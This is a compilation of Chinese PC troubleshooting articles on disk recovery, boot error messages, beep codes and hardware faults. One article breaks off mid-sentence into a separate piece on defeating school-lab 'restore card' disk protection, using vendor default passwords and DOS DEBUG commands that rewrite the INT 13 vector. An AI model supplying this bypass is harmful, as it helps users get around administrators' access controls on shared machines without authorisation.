    在诊断、修复结束后重新启动计算机，若能对C盘进行访问则大功告成，可 以通过备份数据、重装操作系统简单地恢复硬盘功能。否则只能进行恢复操作（ UNDO），尝试手工或通过其他方法恢复。 但NDD（Norton Utilities 8.0）只能在DOS下运行，且不支持FAT32格式。

    ② SCANDISK

    微软操作系统自带的类似NDD的硬盘检测工具，大家对它应该都不会陌生， 因为我们在WIN 9X非法关机后重启时它就会自动运行扫描硬盘，用法有点类似 NDD。

    ③ CHKDSK

    同样也是微软操作系统自带的DOS下专门用于检查硬盘的工具，CHKDSK/F命 令格式专门用来捡回硬盘的丢失簇并释放丢失的硬盘空间，有时我们可以在它运 行以后生成的*.CHK文件里找到一些重要的数据。

    硬盘的FAT表与根目录随着用户写入和删除文件而不断变化，如果能经常备 份FAT表和根目录，当FAT表损坏时用回写FAT表、根目录的方法，可以使硬盘恢 复到上一次保存的状态。当硬盘的FAT表或根目录损坏，需要将保存的FAT表、根 目录数据回写时，必须保证FAT表和根目录的起始逻辑扇区号和长度（扇区个数 ）正确。

    ★ 恢复误删除的分区 ★

    ① FDISK & formAT

    如果在误删除分区后没有执行过其他分区操作，按照下面的方法一般都能够 恢复原来的数据：执行FIDSK分区程序，重建删除的分区，但是注意要保持分区 与原来分区在大小、位置上一致；重新启动系统到MS—DOS模式，执行“format X:/u/q”（X为误删的扩展分区盘符）。这时系统首先会警告说：“这是一个大 硬盘，如果格式化，数据将全部丢失”，这时选择“YES”；而后系统会告诉你 该分区无法进行快速格式化并问你是否进行“完整格式化”，回答“NO”。该步 骤的关键是加入参数/q（快速格式化），这样进行一次“假格式化”后，如果没 有什么意外的话，应该可以访问该分区的数据了。

    另外，该方法恢复的分区有可能在再次重启系统后无法访问，虽然仍可以按 上面的方法恢复数据，但我们建议恢复分区后备份该分区所有数据，而后执行完 整的格式化过程。

    ★ 硬盘零磁道损坏的抢救 ★

    ① DE （PCTOOLS 9.0）

    如果运行ScanDisk扫描C盘在第一簇出现一个红色的“B”，即说明C盘零磁 道损坏！在DOS下运行DE，先进入Options菜单，选项Configuration，按空格去 掉Read Only（只读模式）前面的“√”号（按Tab键切换），保存退出。接着选 主菜单Select中的Drive；进去后在Drive type项选Physical，按空格选定，再 按Tab键切换到Drive项，选中hard disk，然后选OK回车。之后回到主菜单，打 开Select菜单，这时会出现Partition Table，选中并进入，之后就可以看见硬 盘的分区表信息。例如：该硬盘有两个分区，那么在硬盘的分区表信息中我们可 以看到1分区就是C盘，该分区是从硬盘的0柱面开始的，那么将1分区的Beginnig Cylinder的0改成1就可以了。保存后退出。重新启动进入BIOS，运行自动侦测硬 盘可以看到CYLS的个位数减少了一位（例如：782→781），保存退出，重新分区 格式化，大功告成。

    但DE不支持FAT32格式且只在DOS下运行，而且PCTOOLS 9.0现在已经不太好 找了，想当年它与Norton Utilities 8.0在工具软件之中是两朵奇葩……

    ② PQMAGICT

    大名鼎鼎的分区魔术师（Partition Magician）可能是大家最常用的硬盘分 区工具。PQMAGICT是它的DOS版的工具，用它来修复损坏的硬盘零磁道可谓易如 反掌。

    假设一块硬盘有两个分区（C、D），用ScanDisk检查D盘时显示D盘零磁道损 坏，因此不能用formAT不能进行格式化，如果用FDISK重新调整逻辑D盘的大小， 使D盘的逻辑0磁道向前或向后移动，跨越这个坏磁道，但这样一来，就会破坏C 盘上的所有数据。因此这时我们必须借助PQMAGICT的威力。首先在DOS下启动 PQMAGICT（必须先把PQ COPY到C盘），选择查看D盘，此时屏幕会显示D盘的分区 和容量信息，然后选择Option菜单中的Reszie Selected Partition，用鼠标拖 动左边的容量标尺，让D区减少一点，或者直接手动输入分配D区的容量大小，目 的是空出坏的区域，确定后PQMAGICT便开始对D区进行转换，完成以后退出 PQMAGICT。这样对C盘上的文件秋毫无犯，且D盘又重见天日了。

    ② SPecialFDisk

    SPecialFDisk在建立主分区时可由使用者自定启始柱面，故可跳过损坏的柱 面区域。此招是SPecialFDisk的一个必杀技，使用方法请详见《宝刀不老的小工 具——SPecialFDisk》

    ★ 抢救被“逻辑锁”锁定的硬盘 ★

    ① DM

    中了“逻辑锁”的硬盘不能用软盘、光驱、双硬盘正常启动，但我们可以利 用软件DM为硬盘解锁。因为DM是不依赖于主板BIOS识别硬盘的硬盘工具，就算在 主板BIOS中将硬盘设为“NONE”，DM也可识别硬盘并进行分区和格式化等操作。 首先你要把DM拷到一张系统盘上，接上被锁硬盘后开机，按DEL键进入BIOS设置 ，将IDE硬盘设为“NONE”（这是关键所在！）。保存设置后退出，系统即可“ 带锁”启动。启动后运行DM，你会发现DM可以识别出硬盘。选中该硬盘进行分区 格式化就可以了。但是，这种方法的弱点是硬盘上的数据将全部丢失。

    硬盘软故障的产生原因比较复杂，病毒、误操作，甚至一次意外掉电都可能 使硬盘崩溃。因此平时一定要养成备份硬盘重要数据的习惯，在关键时刻才能顺 利地解决问题。

    分析排除篇~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    硬盘故障大致可分为硬故障和软故障两大类。 硬故障即PCBA板损坏、盘片划伤、磁头音圈电机损坏等。由于硬故障维修要 求的基本知识及维修条件较高，需要由专业技术人员才能解决，所以在本文中不 作讨论。

    软故障即硬盘数据结构由于某种原因，比如说病毒导致硬盘数据结构混乱甚 至不可被识别而形成的故障。一般来说，主板BIOS硬盘自动检测（IDE HDD AUTO DETECTION）功能能够检测到硬盘参数，均为软故障。

    一般情况下，硬盘在发生故障时系统会在屏幕上显示一些提示信息，所以我 们可以按照屏幕显示的提示信息找到故障原因，有针对性地实施解决方案。

    ★ 常见的硬盘启动出错信息及分析处理 ★

    ① Non-System disk or disk error，replace disk and press a key to reboot （非系统盘或盘出错）

    出现这种信息的原因一是CMOS参数丢失或硬盘类型设置错误造成的。只要进 入CMOS重新设置硬盘的正确参数即可。二是系统引导程序未装或被破坏。重新传 递引导文件并安装系统程序。

    ② Invalid Partition Table（无效分区表）

    造成该故障的原因一般是硬盘主引导记录中的分表有错误，当指定了多个自 举分区（只能有一个自举分区）或病毒占用了分区表时，将有上述提示。

    主引导记录（MBR）中包括引导程序、分区表和结束标志“55 AA”三个部分 ，共占一个扇区。主引导程序中含有检查硬盘分区表的程序代码和出错信息、出 错处理等内容。当硬盘启动时，主引导程序将检查分区表中的自举标志。若某个 分区为可自举分区，则有分区标志“80”，否则为“00”，系统规定只能有一个 分区为自举分区，若分区表中含有多个自举标志时，主引导程序会给“Invalid Partition Table”的错误提示。最简单的解决方法是用硬盘维护工具来修复， 例如：用NU 8.0 NDD修复，它将检查分区表中的错误，若发现错误，将会询问是 否愿意修改，你只要不断地回答“YES”即可修正错误，或者用备份过的分区表 覆盖它也行。如果是由于病毒感染了分区表，即使是高级格式化也解决不了问题 ，可先用杀毒软件杀毒，再用硬盘维护工具进行修复。

    如果用上述方法也不能解决的话，还可利用FDISK重新分区，但分区大小必 须和原来的分区一样，这一点尤为重要，分区后不要进行高级格式化，然后用 NDD进行修复。这样既保证硬盘修复之后能启动，而且硬盘上的数据也不会丢失 。其实用FDISK分区，相当于用正确的分区表覆盖掉原来的分区表。尤其当用软 盘启动后不认硬盘时，这招特灵。

    ③ Error Loading Operating System（装入DOS引导记录错误）

    Missing Operating System（DOS引导记录损坏）

    造成该故障的原因一般是DOS引导记录出现错误。DOS引导记录位于逻辑0扇 区，是由高级格式化命令formAT生成的。主引导程序在检查分区表正确之后，根 据分区表中指出的DOS分区的起始地址，读DOS引导记录，若连续五次都失败，则 给出“Error Loading Operating System”的错误提示；若能正确读出DOS引导 记录，主引导程序则会将DOS引导记录送入内存0:7c00h处，然后检查DOS引导记 录的最后两个字节是否为“55 AA”，若不是这两个字节，则给出“Missing Operating System”的

十五秒破解“还原卡”
破解方法有2:
第一种破解率还可以.
第二种好像是万能的(俺还没碰到破解不了的----见识短的表现-
第一种:
开机时(也就是在你曾经进入cmos的时刻),同时按住ctrl+home,这样你就进入了
还原卡的密码输入窗口,只要输入正确的密码即可获得admin,以后随你怎样设置.
关于是密码的问题:一般还原卡都有默认密码的,默认密码怎么找,很简单,到网上搜索
关键词"还原卡"就行了,找到你用的那个牌子的还原卡,进入站点,在一个比较偏僻的角落
一般可以找到默认密码的.
而一般机房管理员是不会修改其默认密码的,比如俺学校的
台湾远志牌的还原卡的默认密码是12345678,
小哨兵的是manager, 机房管理员一个也没改,好爽!!!!!!!!!!
不过我可没破坏任何东东,一旦惹怒了俺,嘿嘿....俺也不会破坏的,
恶意破坏计算机就是对自己的不尊重!!!!
如果管理员把密码改了呢?那就拿出宝刀---
方法二:
此法实施过程看起来挺麻烦,不过熟悉了操作起来超不过15秒的-
高手sinister曰:
其实所谓硬盘保护卡就是在ROM中写了一段HOOK INT 13的程序，屏蔽了
一些功能调用如AH=3，5等，在中断向量表中INT 13的SEG，OFFSET
描述为[13h*4+2]，[13h*4]，将此中的程序先保存后，再替换为自己的代码，
当你AH=2的时，它便会call原始INT 13地址来完成操作.
只要找到原始INT 13入口便可以为所欲为.
不知看了这段感觉如何?慢慢消化吧.
主要矛盾:关键是要找到原始的int 13入口.
测试操作系统:win98
测试对象: 台湾远志还原卡
测试地点: 学校机房
测试目的: 控制还原卡,但不破坏.
注:本篇文章不对其实施过程中出现的任何不可预料的情况负责!!!!!
具体过程如下:
开机过程按住F8键,进入纯dos环境, 注";"后为注释.
出现提示符c:,
键入c:\debug,
- a100
- xor ax,ax
- int 13
- int3
; 寻找原始的int 13入口.
然后输入t回车，不断的重复，直到显示的地址形如 F000:xxxx
,后面的指令为:mov dl,80 (练练眼力-。按q退出.
记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。
例如俺的得到的地址是F000:9A95
再次运行debug ,键入:
-e 0:4c 95 9A 00 F0 ;e的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中.
-q
注： 填的时候要仔细，填错的话会死机。ok,破解完成.
这时在提示符c:\键入
c:\win
进入win98系统即可,那么这次你在win98系统中的一切操作,随着下一次
的启动都会被还原卡存储起来。
不过下一次进入系统的的时候，你还是需要重写地址0:4c,才可以让还原卡存储你的东东。
这时只需要在纯dos下进入debug,键入
-e 0:4c 95 9A 00 F0
-q 即可。

用开机信息诊断计算机硬件故障
电脑出现故障是常见的，有许多故障在机器启动阶段就能确诊，特别是硬件故障，完全可以利用计算机启动过程中发出的报警声及屏幕显示信息确定机器故障原因。下面依照电脑的启动流程，介绍常见硬件故障的类型和排除方法。

    <B>开机阶段</B>

    电脑启动的第一步当然是接通电源，系统在主板BIOS的控制下进行自检和初始化。如果电源工作正常，你应该听到电源风扇转动的声音，机箱上的电源指示灯长亮；硬盘和键盘上的“NumLock”等三个指示灯则是亮一下（然后再熄灭）；显示器也要发出轻微的“唰”声（它比消磁发出的声音小得多），这是显示卡信号送到的标志。这一阶段常见故障有：风扇不转动，同时看不到电源指示灯亮。可以肯定是电源问题，应该检查机箱后面的电源插头是否插紧，可以拔出来重新插入。当然，电源插座、UPS保险丝等部位也应当仔细检查电源指示灯亮，屏幕无反应，无报警声。你应该着重检查主板和CPU。因为此时系统是由主板BIOS控制的，在基础自检结束前，电脑不会发出报警声响，屏幕也不会显示任何错误提示。此时要从以下几方面检查：

（1）检查主板上的Flash ROM芯片，在关闭电源后重新将它按紧，使其接触良好；

（2）检查主板BIOS芯片，有可能受CIH病毒攻击或BIOS升级不成功；

（3）检查CPU，可用替换法确定；

（4）检查内存条，在关闭电源后将它重新插紧使其接触良好或用替换法进一步证实其好坏；

（5）检查是否使用了非标准外频。如果你使用了75MHz、83MHz等非标准外频，质量较差的显卡就可能通不过，应使用66MHz、100MHz等标准外频；

（6）机箱制作粗糙，复位（RESET）键按下后弹不起来或内部卡死，使复位键一直处于工作状态。你可以用万用表检查或者将主板上的RESET跳线拔下再试；

（7）检查主板电源。电源指示灯亮，且硬盘指示灯长亮不熄。说明硬盘有问题，有两种可能：一是硬盘数据线插反了；二是硬盘本身存在物理故障，应予更换。致命性的硬件故障测试检测CPU、内部总线、基本内存、中断、显示存储器和ROM等核心部件。此时可通过扬声器发出的“嘟”声次数来确定故障部位。常见的有：

    电脑发出1长1短报警声。说明内存或主板出错，换一内存条试试。

    电脑发出1长2短报警声。说明键盘控制器错误，应检查主板。

    电脑发出1长3短的警报声。说明存在显示器或显示卡存在错误。你可以关闭电源，检查显

    卡和显示器插头等部位是否接触良好或用替换法确定显卡和显示器是否损坏。

    电脑发出1长9短报警声。说明主板Flash ROM、EPROM错误或BIOS损坏，用替换法进一步确

    定故障根源，要注意的是必须是同型号主板。

    电脑发出重复短响。说明主板电源有问题。

    电脑发出不间断的长“嘟”声。说明系统检测到内存条有问题，应关闭电源重新安装内存

    条或更换新内存条重试。

    非致命性的硬件故障测试

    系统发出“嘟”的一声说明开机阶段正常且无致命性硬件故障，进入非致命性的硬件故障测试阶段。这时，屏幕显示显卡型号、主板BIOS信息、内存检测信息等等。如果这时自检中断，可根据屏幕提示确定故障部位：

    IDE接口设备检测信息为：

    “Detecting Primary Master．．． None”

    “Detecting Primary Slave．．．None”

    “Detecting Secondary Master．．．None”

    “Detecting Secondary Slave．．．Philips CD－ROM DRIVE 40X MAXIMUM”

    表明两个IDE接口都没有找到硬盘，说明硬盘没接上或硬盘有故障，应从以下几方面检查：

①硬盘电源是否有电或接触不良；

②硬盘接口线有没有接反、松动；

③CMOS设置有无错误，进入CMOS检查“Primary Master”、“Primary Slave”、“Secondary Master”三项的参数有无与所接硬盘不符的情况，最可靠的办法是将这三项的“TYPE”都设置成“Auto”；

④硬盘本身物理故障。

    在IDE接口设备检测信息下面显示“Floppy disks fail40”出错信息，表示CMOS所指定的软盘驱动器有问题。可能的问题有：

①软驱电源有问题，电源线无电或与软驱接口接触不良；

②软驱数据线接反、松动；

③CMOS设置错误，进入CMOS检查“Drive A”的类型，如与所接软驱的类型不符应重新设置，目前一般都是“1．44M 3．5 in．”；

④软驱本身物理故障。

    CMOS Battery state low CMOS 电池电压过低，应更换。

CMOS Checksum Failure CMOS 中的BIOS检验和读出错，应重新运行 CMOS SETUP程序。

CMOS System Option Not Set

    CMOS系统未设置。

    CMOS Display Type Mismatch

    CMOS中显示类型的设置与实测不一致，应重新设置。

    Display Switch Not Proper主板上的显示模式跳线设置错误。

    Keyboard is Lock．．．Unlock it键盘被锁住，打开锁后重新引导系统。

    KeyBoard Error键盘时序错。

    KB Interface Error键盘接口错。

    CMOS Memory Size Mismatch主板上的主存储器与CMOS中设置的不一样。

    FDD Controller Failure BIOS不能与软盘驱动器交换信息，应检查FDD控制卡及电缆。

    HDD Controller Failure BIOS不能与硬盘驱动器交换信息，应检查HDD控制器及电缆。

    CDrive Error BIOS未收到硬盘C的响应信号，应检查CMOS SETUP 中硬盘类型的设置或运行其中的“hard Disk Utility”查找问题。

    DDrive Error BIOS未收到硬盘D的响应信号，处理方法同上。

    CDrive Failure硬盘C对主机信息无反应，检查或更换硬盘驱动器C。

    DDrive Failure硬盘D对主机无反应，检查或更换硬盘驱动器D。

    CMOS Time ＆ Date Not Set CMOS中的时间和日期没有设置，应进入SETUP进行设置。

    Cache Memory Bad Dot Enable Cache 主板上的高速缓存Cache坏，应更换。

    8042 Gate A20 Error 8042芯片坏，应更换。

    Address Line Short 主板上地址译码电路故障。

    DMA ＃2 Error 存储器直接访问DMA的2号通道错。

    DMA ＃1 Error 存储器直接访问DMA的1号通道错。

    DMA Error DMA 控制器坏，应更换。

    No ROM BASIC 当软驱或硬盘上的引导扇区找不到时，BIOS试图进入ROM BASIC程序失败。

    Diskette Boot Failure 软驱中的系统引导软盘坏。

    Invalid Boot Diskette 读出的软盘引导程序出错，换盘再试。

    On Board Parity Error 主板上的存储器奇偶校验错，出错的地址在第二行中给出，格式是：ADDRHEX＝。

    OFF Board Parity Error主板I／0总线扩展插槽上的内存扩展卡的存储器奇偶校验错，出错的地址在第二行给出，格式是：ADDRHEX＝。

    Parity Error﹖ 内存的奇偶校验错但其地址无法确定。

    屏幕显示“Keyboard error or no Keyboard present”出错信息，说明键盘有问题。一般

    是键盘线与主板接口连接有问题，关机后把键盘线拔下重新插紧即可；如重新开机后仍然

    出现此信息，这说明键盘本身有故障。


硬件常见问题集锦(3)

《一键清理系统垃圾》

硬件常见问题集锦(3)

电脑综合故障

    电脑出现的故障原因扑朔迷离，让人难以捉摸。并且由于Windows操作系统的组件相对复杂，电脑一旦出现故障，对于普通用户来说，想要准确地找出其故障的原因几乎是不可能的。那么是否是说我们如果遇到电脑故障的时候，就完全束手无策了呢？其实并非如此，使电脑产生故障的原因虽然有很多，但是，只要我们细心观察，认真总结，我们还是可以掌握一些电脑故障的规律和处理办法的。在本期的小册子中，我们就将一些最为常见也是最为典型的电脑故障的诊断、维护方法展示给你，通过它，你就会发现——解决电脑故障方法就在你的身边，简单，但有效！
    电脑是由各种配件组合而成的，下面，我们就根据组成电脑的各个部件分别对其经常出现的故障进行分析。

一、主板

    主板是整个电脑的关键部件，在电脑起着至关重要的作用。如果主板产生故障将会影响到整个PC机系统的工作。下面，我们就一起来看看主板在使用过程中最常见的故障有哪些。

常见故障一：开机无显示

    电脑开机无显示，首先我们要检查的就是是BIOS。主板的BIOS中储存着重要的硬件数据，同时BIOS也是主板中比较脆弱的部分，极易受到破坏，一旦受损就会导致系统无法运行，出现此类故障一般是因为主板BIOS被CIH病毒破坏造成（当然也不排除主板本身故障导致系统无法运行。）。一般BIOS被病毒破坏后硬盘里的数据将全部丢失，所以我们可以通过检测硬盘数据是否完好来判断BIOS是否被破坏，如果硬盘数据完好无损，那么还有三种原因会造成开机无显示的现象：

    1. 因为主板扩展槽或扩展卡有问题，导致插上诸如声卡等扩展卡后主板没有响应而无显示。

    2. 免跳线主板在CMOS里设置的CPU频率不对，也可能会引发不显示故障，对此，只要清除CMOS即可予以解决。清除CMOS的跳线一般在主板的锂电池附近，其默认位置一般为1、2短路，只要将其改跳为2、3短路几秒种即可解决问题，对于以前的老主板如若用户找不到该跳线，只要将电池取下，待开机显示进入CMOS设置后再关机，将电池上上去亦达到CMOS放电之目的。

    3. 主板无法识别内存、内存损坏或者内存不匹配也会导致开机无显示的故障。某些老的主板比较挑剔内存，一旦插上主板无法识别的内存，主板就无法启动，甚至某些主板不给你任何故障提示（鸣叫）。当然也有的时候为了扩充内存以提高系统性能，结果插上不同品牌、类型的内存同样会导致此类故障的出现，因此在检修时，应多加注意。

    对于主板BIOS被破坏的故障，我们可以插上ISA显卡看有无显示（如有提示，可按提示步骤操作即可。），倘若没有开机画面，你可以自己做一张自动更新BIOS的软盘，重新刷新BIOS，但有的主板BIOS被破坏后，软驱根本就不工作，此时，可尝试用热插拔法加以解决（我曾经尝试过，只要BIOS相同，在同级别的主板中都可以成功烧录。）。但采用热插拔除需要相同的BIOS外还可能会导致主板部分元件损坏，所以可靠的方法是用写码器将BIOS更新文件写入BIOS里面（可找有此服务的电脑商解决比较安全）。

常见故障二：CMOS设置不能保存
    此类故障一般是由于主板电池电压不足造成，对此予以更换即可，但有的主板电池更换后同样不能解决问题，此时有两种可能：

    1. 主板电路问题，对此要找专业人员维修；

    2. 主板CMOS跳线问题，有时候因为错误的将主板上的CMOS跳线设为清除选项，或者设置成外接电池，使得CMOS数据无法保存。

常见故障三：在Windows下安装主板驱动程序后出现死机或光驱读盘速度变慢的现象

    在一些杂牌主板上有时会出现此类现象，将主板驱动程序装完后，重新启动计算机不能以正常模式进入Windows 98桌面，而且该驱动程序在Windows 98下不能被卸载。如果出现这种情况，建议找到最新的驱动重新安装，问题一般都能够解决，如果实在不行，就只能重新安装系统。

常见故障四：安装Windows或启动Windows时鼠标不可用

    出现此类故障的软件原因一般是由于CMOS设置错误引起的。在CMOS设置的电源管理栏有一项modem use IRQ项目，他的选项分别为3、4、5......、NA，一般它的默认选项为3，将其设置为3以外的中断项即可。

常见故障五：电脑频繁死机，在进行CMOS设置时也会出现死机现象

    在CMOS里发生死机现象，一般为主板或CPU有问题，如若按下法不能解决故障，那就只有更换主板或CPU了。

    出现此类故障一般是由于主板Cache有问题或主板设计散热不良引起，笔者在815EP主板上就曾发现因主板散热不够好而导致该故障的现象。在死机后触摸CPU周围主板元件，发现其温度非常烫手。在更换大功率风扇之后，死机故障得以解决。对于Cache有问题的故障，我们可以进入CMOS设置，将Cache禁止后即可顺利解决问题，当然，Cache禁止后速度肯定会受到有影响。

常见故障六：主板COM口或并行口、IDE口失灵

    出现此类故障一般是由于用户带电插拔相关硬件造成，此时用户可以用多功能卡代替，但在代替之前必须先禁止主板上自带的COM口与并行口（有的主板连IDE口都要禁止方能正常使用）。

显卡
常见故障一：开机无显示

    此类故障一般是因为显卡与主板接触不良或主板插槽有问题造成。对于一些集成显卡的主板，如果显存共用主内存，则需注意内存条的位置，一般在第一个内存条插槽上应插有内存条。由于显卡原因造成的开机无显示故障，开机后一般会发出一长两短的蜂鸣声（对于AWARD BIOS显卡而言）。

常见故障二：显示花屏，看不清字迹

    此类故障一般是由于显示器或显卡不支持高分辨率而造成的。花屏时可切换启动模式到安全模式，然后再在Windows 98下进入显示设置，在16色状态下点选“应用”、“确定”按钮。重新启动，在Windows 98系统正常模式下删掉显卡驱动程序，重新启动计算机即可。也可不进入安全模式，在纯DOS环境下，编辑
SYSTEM.INI文件，将display.drv=pnpdrver改为display.drv=vga.drv后，存盘退出，再在Windows里更新
驱动程序。

常见故障三：颜色显示不正常，此类故障一般有以下原因：
    1. 显示卡与显示器信号线接触不良
    2. 显示器自身故障
    3. 在某些软件里运行时颜色不正常，一般常见于老式机，在BIOS里有一项校验颜色的选项，将其开启即可
    4. 显卡损坏；
    5. 显示器被磁化，此类现象一般是由于与有磁性能的物体过分接近所致，磁化后还可能会引起显示画面出现偏转的现象。

常见故障四：死机

    出现此类故障一般多见于主板与显卡的不兼容或主板与显卡接触不良；显卡与其它扩展卡不兼容也会造成死机。

常见故障五：屏幕出现异常杂点或图案

    此类故障一般是由于显卡的显存出现问题或显卡与主板接触不良造成。需清洁显卡金手指部位或更换显
卡。

常见故障六：显卡驱动程序丢失

    显卡驱动程序载入，运行一段时间后驱动程序自动丢失，此类故障一般是由于显卡质量不佳或显卡与主板不兼容，使得显卡温度太高，从而导致系统运行不稳定或出现死机，此时只有更换显卡。

    此外，还有一类特殊情况，以前能载入显卡驱动程序，但在显卡驱动程序载入后，进入Windows时出现死机。可更换其它型号的显卡在载入其驱动程序后，插入旧显卡予以解决。如若还不能解决此类故障，则说明注册表故障，对注册表进行恢复或重新安装操作系统即可。

声卡
常见故障一：声卡无声。出现这种故障常见的原因有：

    1. 驱动程序默认输出为“静音”。单击屏幕右下角的声音小图标（小嗽叭），出现音量调节滑块，下方有“静音”选项，单击前边的复选框，清除框内的对号，即可正常发音。

    2. 声卡与其它插卡有冲突。解决办法是调整PnP卡所使用的系统资源，使各卡互不干扰。有时，打开“设备管理”，虽然未见黄色的惊叹号（冲突标志），但声卡就是不发声，其实也是存在冲突，只是系统没有检查出来。

    3. 安装了Direct X后声卡不能发声了。说明此声卡与Direct X兼容性不好，需要更新驱动程序。

    4. 一个声道无声。检查声卡到音箱的音频线是否有断线。

常见故障二：声卡发出的噪音过大．出现这种故障常见的原因有：

    1. 插卡不正。由于机箱制造精度不够高、声卡外挡板制造或安装不良导致声卡不能与主板扩展槽紧密结合，目视可见声卡上“金手指”与扩展槽簧片有错位。这种现象在ISA卡或PCI卡上都有，属于常见故障。一般可用钳子校正。

    2. 有源音箱输入接在声卡的Speaker输出端。对于有源音箱，应接在声卡的Line out端，它输出的信号
没有经过声卡上的功放，噪声要小得多。有的声卡上只有一个输出端，是Line out还是Speaker要靠卡上的跳线决定，厂家的默认方式常是Speaker，所以要拔下声卡调整跳线。

    3. Windows自带的驱动程序不好。在安装声卡驱动程序时，要选择“厂家提供的驱动程序”而不要选
“Windows默认的驱动程序”如果用“添加新硬件”的方式安装，要选择“从磁盘安装”而不要从列表框中选择。如果已经安装了Windows自带的驱动程序，可选“控制面板→系统→设备管理→声音、视频和游戏控制器”，点中各分设备，选“属性→驱动程序→更改驱动程序→从磁盘安装”。这时插入声卡附带的磁盘或光盘，装入厂家提供的驱动程序。

常见故障三：声卡无法“即插即用”

    1. 尽量使用新驱动程序或替代程序。笔者曾经有一块声卡，在Windows 98下用原驱动盘安装驱动程序怎么也装不上，只好用Creative SB16驱动程序代替，一切正常。后来升级到Windows Me，又不正常了再换用Windows 2000（完整版）自带的声卡驱动程序才正常。

    2. 最头痛的问题莫过于Windows 9X下检测到即插即用设备却偏偏自作主张帮你安装驱动程序，这个驱动程序偏是不能用的，以后，每次当你删掉重装都会重复这个问题，并且不能用“添加新硬件”的方法解决。笔者在这里泄露一个独门密招：进入Win9xinfother目录，把关于声卡的＊.inf文件统统删掉再重新启动后用手动安装，这一着百分之百灵验，曾救活无数声卡性命……当然，修改注册表也能达到同样的目的。

    3. 不支持PnP声卡的安装（也适用于不能用上述PnP方式安装的PnP声卡）：进入“控制面板”/“添加新硬件”/“下一步”，当提示“需要Windows搜索新硬件吗？”时，选择“否”，而后从列表中选取“声音、视频和游戏控制器”用驱动盘或直接选择声卡类型进行安装。

常见故障四：播放CD无声

    1. 完全无声。用Windows 98的“CD播放器”放CD无声，但“CD播放器”又工作正常，这说明是光驱的音频线没有接好。使用一条4芯音频线连接CD－ROM的模拟音频输出和声卡上的CD－in即可，此线在购买CD－ROM时会附带。

    2. 只有一个声道出声。光驱输出口一般左右两线信号，中间两线为地线。由于音频信号线的4条线颜色一般不同，可以从线的颜色上找到一一对应接口。若声卡上只有一个接口或每个接口与音频线都不匹配，只好改动音频线的接线顺序，通常只把其中2条线对换即可。

常见故障五：PCI声卡出现爆音

    一般是因为PCI显卡采用Bus Master技术造成挂在PCI总线上的硬盘读写、鼠标移动等操作时放大了背景
噪声的缘故。解决方法：关掉PCI显卡的Bus Master功能，换成AGP显卡，将PCI声卡换插槽上。

常见故障六：无法正常录音

    首先检查麦克风是否有没有错插到其他插孔中了，其次，双击小喇叭，选择选单上的“属性→录音”，看看各项设置是否正确。接下来在“控制面板→多媒体→设备”中调整“混合器设备”和“线路输入设备”，把它们设为“使用”状态。如果“多媒体→音频”中“录音”选项是灰色的那可就糟了，当然也不是没有挽救的余地，你可以试试“添加新硬件→系统设备”中的添加“ISA Plug and Play bus”，索性把声卡随卡工具软件安装后重新启动。

常见故障七：无法播放Wav音乐、Midi音乐

    不能播放Wav音乐现象比较罕见，常常是由于“多媒体”→“设备”下的“音频设备”不只一个，禁用一个即可；无法播放MIDI文件则可能有以下3种可能：

    1. 早期的ISA声卡可能是由于16位模式与32位模式不兼容造成MIDI播放的不正常，通过安装软件波表的
方式应该可以解决

    2. 如今流行的PCI声卡大多采用波表合成技术，如果MIDI部分不能放音则很可能因为您没有加载适当的波表音色库。

    3. Windows音量控制中的MIDI通道被设置成了静音模式。

常见故障八：PCI声卡在WIN98下使用不正常

    有些用户反映，在声卡驱动程序安装过程中一切正常，也没有出现设备冲突，但在WIN98下面就是无法出声或是出现其他故障。这种现象通常出现在PCI声卡上，请检查一下安装过程中您把PCI声卡插在的哪条PCI插槽上。有些朋友出于散热的考虑，喜欢把声卡插在远离AGP插槽，靠近ISA插槽的那几条PCI插槽中。问题往往就出现在这里，因为Windows98有一个Bug：有时只能正确识别插在PCI-1和PCI-2两个槽的声卡。而在ATX主板上紧靠AGP的两条PCI才是PCI-1和PCI-2（在一些ATX主板上恰恰相反，紧靠ISA的是PCI-1），所以如果您没有把PCI声卡安装在正确的插槽上，问题就会产生了。

硬盘
    硬盘是负责存储我们的资料的软件的仓库，硬盘的故障如果处理不当往往会导致系统的无法启动和数据的丢失，那么，当我们应该如何应对硬盘的常见故障呢？

常见故障一：系统不认硬盘

    系统从硬盘无法启动，从A盘启动也无法进入C盘，使用CMOS中的自动监测功能也无法发现硬盘的存在。这种故障大都出现在连接电缆或IDE端口上，硬盘本身故障的可能性不大，可通过重新插接硬盘电缆或者改换IDE口及电缆等进行替换试验，就会很快发现故障的所在。如果新接上的硬盘也不被接受，一个常见的原因就是硬盘上的主从跳线，如果一条IDE硬盘线上接两个硬盘设备，就要分清楚主从关系。

常见故障二：硬盘无法读写或不能辨认

    这种故障一般是由于CMOS设置故障引起的。CMOS中的硬盘类型正确与否直接影响硬盘的正常使用。现在的机器都支持“IDE Auto Detect”的功能，可自动检测硬盘的类型。当硬盘类型错误时，有时干脆无法启动系统，有时能够启动，但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量，则硬盘后面的扇区将无法读写，如果是多分区状态则个别分区将丢失。还有一个重要的故障原因，由于目前的IDE都支持逻辑参数类型，硬盘可采用“Normal,LBA,Large”等，如果在一般的模式下安装了数据,而又在CMOS中改为其它的模式，则会发生硬盘的读写错误故障，因为其映射关系已经改变，将无法读取原来的正确硬盘位置。

常见故障三：系统无法启动
造成这种故障通常是基于以下四种原因：
    1. 主引导程序损坏
    2. 分区表损坏
    3. 分区有效位错误
    4. DOS引导文件损坏
    其中，DOS引导文件损坏最简单，用启动盘引导后，向系统传输一个引导文件就可以了。主引导程序损坏和分区有效位损坏一般也可以用FDISK /MBR强制覆写解决。分区表损坏就比较麻烦了，因为无法识别分区，系统会把硬盘作为一个未分区的裸盘处理，因此造成一些软件无法工作。不过有个简单的方法——使用Windows 2000。找个装有Windows 2000的系统，把受损的硬盘挂上去，开机后，由于Windows 2000为了保证系统硬件
的稳定性会对新接上去的硬盘进行扫描。Windows 2000的硬盘扫描程序CHKDSK对于因各种原因损坏的硬盘都
有很好的修复能力，扫描完了基本上也修复了硬盘。

